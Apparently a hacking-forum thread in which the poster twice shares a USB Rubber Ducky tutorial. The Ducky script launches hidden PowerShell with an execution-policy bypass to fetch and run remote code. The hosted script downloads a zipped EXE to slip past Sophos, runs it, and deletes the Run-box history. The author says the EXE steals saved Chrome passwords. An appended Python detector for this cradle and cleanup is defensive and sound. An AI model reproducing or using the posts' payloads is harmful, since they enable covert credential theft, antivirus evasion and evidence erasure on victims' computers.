WAZ

Posts posted by WAZ

  1. 2 minutes ago, WAZ said:

    How does it work / what is it?

    I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky!

    This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 characters long, which takes the ducky only around 2 seconds to input.

    Tutorial:

    First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Remember, though, that these servers may not have 100% uptime.

    Script for website:

    The code on my website looks something like below. You can put whatever you want in here. Personally, I used it to download an .EXE which dumps saved Chrome passwords into a database using an API we created.

    
    Add-Type -AssemblyName System.IO.Compression.FileSystem
    function Unzip
    {
        param([string]$zipfile, [string]$outpath)
    
        [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
    }
    
    $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" 
    $arr = (Get-Item -Path $path).Property 
    $url = "www.linkToEndPayload"
    $output = "$env:temp/test.zip";
    $out = "$env:temp/Remake.txt";
    
    Remove-Item -Path $output
    Invoke-WebRequest -Uri $url -OutFile $output
    
    Unzip $output "$env:temp/"
    Rename-Item -Path $out -NewName "Remake.exe"
    
    Start-Process -FilePath "$env:temp/Remake.exe"
    
    foreach($item in $arr) 
    { 
       if($item -ne "MRUList") 
       { 
         Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue 
       } 
    }

    This code downloads the .EXE payload (which is stored in a .ZIP file). We will be running this file on our subject's system. Then the code uses an imported C# library to extract the .ZIP file, which allows us to bypass a web protection software called Sophos that would otherwise block the .EXE we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the Run box history that the ducky creates.

    Finally, we have to set up the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...

    Script for ducky:

    
    DELAY 500
    GUI r
    DELAY 100
    STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a
    ENTER

    That's it! Very fast PowerShell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to an internet connection.

    PS: I'm not very good at PowerShell scripting :wacko: + First post!

     

  2. How does it work / what is it?

    I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky!

    This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 characters long, which takes the ducky only around 2 seconds to input.

    Tutorial:

    First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Remember, though, that these servers may not have 100% uptime.

    Script for website:

    The code on my website looks something like this...

    Add-Type -AssemblyName System.IO.Compression.FileSystem
    function Unzip
    {
        param([string]$zipfile, [string]$outpath)
    
        [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
    }
    
    $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" 
    $arr = (Get-Item -Path $path).Property 
    $url = "www.linkToEndPayload"
    $output = "$env:temp/test.zip";
    $out = "$env:temp/Remake.txt";
    
    Remove-Item -Path $output
    Invoke-WebRequest -Uri $url -OutFile $output
    
    Unzip $output "$env:temp/"
    Rename-Item -Path $out -NewName "Remake.exe"
    
    Start-Process -FilePath "$env:temp/Remake.exe"
    
    foreach($item in $arr) 
    { 
       if($item -ne "MRUList") 
       { 
         Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue 
       } 
    }

    This code downloads the .EXE payload (which is stored in a .ZIP file). We will be running this file on our subject's system. Then the code uses an imported C# library to extract the .ZIP file, which allows us to bypass a web protection software called Sophos that would otherwise block the .EXE we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the Run box history that the ducky creates.

    Finally, we have to set up the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...

    Script for ducky:

    DELAY 500
    GUI r
    DELAY 100
    STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a
    ENTER

    That's it! Very fast PowerShell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to an internet connection.

    PS: I'm not very good at PowerShell scripting :wacko:
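An added, defender-side example that is not part of WAZ's posts or of any Hak5 tooling: the one-liner the ducky types into the Run box and the RunMRU cleanup in the website script (both posts above show the same two pieces) each leave a distinctive trace on the endpoint. The Python below scores PowerShell process command lines for the traits that line combines (hidden window, execution-policy bypass, a web fetch fed into Invoke-Expression), notes when powershell.exe was spawned by explorer.exe as a Run-dialog launch would be, and flags value deletions under the RunMRU key made by powershell.exe rather than by Explorer. The event records and their field names are constructed to loosely resemble Sysmon process-creation and registry events; the URL and SID in them are placeholders.

```python
"""Flag the PowerShell download cradle and RunMRU cleanup described in the post.

Constructed events only; field names loosely follow Sysmon Event ID 1 (process
creation) and Event ID 12 (registry object create/delete).
"""
import re

# One pattern per trait of the command line in the post. Short aliases (iwr,
# iex, irm, -ep) are included so trivial re-spellings do not dodge the check.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "exec_bypass": re.compile(r"-e(?:p|x|xec|xecutionpolicy)?\s+bypass\b", re.I),
    "web_fetch": re.compile(
        r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget"
        r"|downloadstring|downloadfile)\b", re.I),
    "eval": re.compile(r"\b(?:invoke-expression|iex)\b", re.I),
}

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation records. The first mirrors the post's Ducky line
# (placeholder URL), the others are ordinary admin launches for contrast.
PROCESS_EVENTS = [
    {"Image": PS_IMAGE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest "
                    "http://example.invalid/script.txt; Invoke-Expression $a"},
    {"Image": PS_IMAGE, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass "
                    r"-File C:\Scripts\nightly-backup.ps1"},
    {"Image": PS_IMAGE, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -w hidden -c Get-Date"},
]

# Constructed registry records (placeholder SID). Explorer writing RunMRU is
# normal; powershell.exe deleting RunMRU values is the post's own cleanup step.
RUNMRU_BASE = (r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows"
               r"\CurrentVersion\Explorer\RunMRU")
REGISTRY_EVENTS = [
    {"EventType": "DeleteValue", "Image": PS_IMAGE,
     "TargetObject": RUNMRU_BASE + r"\a"},
    {"EventType": "SetValue", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": RUNMRU_BASE + r"\b"},
]

RUNMRU_PATH = re.compile(r"\\explorer\\runmru\\", re.I)


def score_command_line(cmd):
    """Return the names of the indicators present in one command line."""
    return [name for name, pat in INDICATORS.items() if pat.search(cmd)]


def classify(cmd):
    """A fetch feeding an evaluator is the cradle itself. Hidden window or
    bypass on their own are common in legitimate automation, so they only
    raise a verdict when two or more traits coincide."""
    hits = set(score_command_line(cmd))
    if {"web_fetch", "eval"} <= hits:
        return "download_cradle"
    if len(hits) >= 2:
        return "suspicious"
    return "benign"


def run_box_launch(event):
    """GUI r opens the Run dialog, so the resulting powershell.exe has
    explorer.exe as its parent; scripted admin launches rarely do."""
    return (event["Image"].lower().endswith("\\powershell.exe")
            and event["ParentImage"].lower().endswith("\\explorer.exe"))


def runmru_tamper(event):
    """Value deletion under RunMRU by powershell.exe, the post's final step."""
    return (event["EventType"] == "DeleteValue"
            and RUNMRU_PATH.search(event["TargetObject"]) is not None
            and event["Image"].lower().endswith("\\powershell.exe"))


def triage(process_events, registry_events):
    """One finding string per flagged event, in input order."""
    findings = []
    for ev in process_events:
        verdict = classify(ev["CommandLine"])
        if verdict != "benign":
            via = " (launched from the Run dialog)" if run_box_launch(ev) else ""
            findings.append(f"{verdict}{via}: {ev['CommandLine']}")
    for ev in registry_events:
        if runmru_tamper(ev):
            findings.append(f"runmru_cleanup: {ev['TargetObject']} by {ev['Image']}")
    return findings


if __name__ == "__main__":
    for line in triage(PROCESS_EVENTS, REGISTRY_EVENTS):
        print(line)
```

The fetch-plus-eval pair is the part worth alerting on by itself; the hidden-window and bypass switches, and the explorer.exe parent, are context that raises priority, because a backup script run with -ExecutionPolicy Bypass (the second constructed record) should stay quiet. The RunMRU check is the cheap win: the post's own cleanup loop is exactly what a benign process never does.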
